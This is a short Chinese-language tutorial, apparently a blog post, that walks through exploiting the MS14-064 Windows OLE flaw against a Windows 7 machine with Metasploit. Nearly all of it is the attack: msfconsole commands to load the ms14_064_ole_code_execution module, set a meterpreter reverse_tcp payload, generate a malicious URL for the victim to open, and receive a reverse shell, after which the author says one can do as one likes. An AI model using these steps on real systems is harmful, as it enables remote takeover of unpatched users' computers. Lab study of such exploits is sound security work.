MS14-064 漏洞测试入侵win7

时间:2022-05-06 17:22:00

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

执行命令:

msfconsole    //启动MSF

search ms14   //搜索关键字

use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

如图:

MS14-064 漏洞测试入侵win7

需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

所以我们这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行exploit即可

MS14-064 漏洞测试入侵win7

得到一个URL地址,复制到受害者机器(win7)测试

MS14-064 漏洞测试入侵win7

当用户点击允许了后

可以看见这边反弹了一个shell,接下里我们就可以随便玩了,

MS14-064 漏洞测试入侵win7

测试成功,结束。